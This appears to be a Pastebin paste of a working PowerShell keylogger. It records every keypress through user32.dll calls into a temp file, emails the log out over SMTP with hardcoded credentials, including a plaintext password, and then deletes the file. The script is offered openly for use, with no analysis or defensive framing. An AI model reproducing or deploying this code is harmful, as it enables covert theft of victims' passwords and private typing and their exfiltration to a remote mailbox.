Advertisement
Guest User

Untitled

a guest
Feb 18th, 2020
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.06 KB | None | 0 0
  1. # Edit only this section!
  2. $TimesToRun = 1
  3. $RunTimeP = 1
  4. $Pass = "Hulkbulk12390"
  5. $Subject = "Keylogger Results"
  6. $body = "Keylogger Results"
  7. $SMTPServer = "smtp.mail.com"
  8. $SMTPPort = "587"
  9. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
  10. ############################
  11.  
  12.  
  13. $TimeStart = Get-Date
  14. $TimeEnd = $timeStart.addminutes($RunTimeP)
  15.  
  16. #requires -Version 2
  17. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  18. {
  19. # Signatures for API Calls
  20. $signatures = @'
  21. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  22. public static extern short GetAsyncKeyState(int virtualKeyCode);
  23. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  24. public static extern int GetKeyboardState(byte[] keystate);
  25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  26. public static extern int MapVirtualKey(uint uCode, int uMapType);
  27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  28. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  29. '@
  30.  
  31. # load signatures and make members available
  32. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  33.  
  34. # create output file
  35. $null = New-Item -Path $Path -ItemType File -Force
  36.  
  37. try
  38. {
  39.  
  40. # create endless loop. When user presses CTRL+C, finally-block
  41. # executes and shows the collected key presses
  42. $Runner = 0
  43. while ($TimesToRun -ge $Runner) {
  44. while ($TimeEnd -ge $TimeNow) {
  45. Start-Sleep -Milliseconds 40
  46.  
  47. # scan all ASCII codes above 8
  48. for ($ascii = 9; $ascii -le 254; $ascii++) {
  49. # get current key state
  50. $state = $API::GetAsyncKeyState($ascii)
  51.  
  52. # is key pressed?
  53. if ($state -eq -32767) {
  54. $null = [console]::CapsLock
  55.  
  56. # translate scan code to real code
  57. $virtualKey = $API::MapVirtualKey($ascii, 3)
  58.  
  59. # get keyboard state for virtual keys
  60. $kbstate = New-Object Byte[] 256
  61. $checkkbstate = $API::GetKeyboardState($kbstate)
  62.  
  63. # prepare a StringBuilder to receive input key
  64. $mychar = New-Object -TypeName System.Text.StringBuilder
  65.  
  66. # translate virtual key
  67. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  68.  
  69. if ($success)
  70. {
  71. # add key to logger file
  72. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  73. }
  74. }
  75. }
  76. $TimeNow = Get-Date
  77. }
  78. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
  79. Remove-Item -Path $Path -force
  80. }
  81. }
  82. finally
  83. {
  84. # open logger file in Notepad
  85. exit 1
  86. }
  87. }
  88.  
  89. # records all key presses until script is aborted by pressing CTRL+C
  90. # will then open the file with collected key codes
  91. Start-KeyLogger
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement